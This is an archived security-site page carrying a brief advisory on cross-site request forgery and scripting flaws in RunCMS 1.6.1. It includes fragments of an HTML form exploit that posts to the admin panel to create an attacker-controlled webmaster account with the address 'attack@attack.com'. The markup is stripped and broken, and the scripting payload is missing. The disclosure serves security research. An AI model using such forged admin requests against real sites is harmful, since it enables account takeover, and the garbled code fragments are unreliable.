Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx1976.htm

RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties



RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties



###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties           by NBBN
###################################################################

[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]

action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r"> value="attack@attack.com"> Also with XSRF an attacker can update the profile of all users. He can change the password etc... [b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b] action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH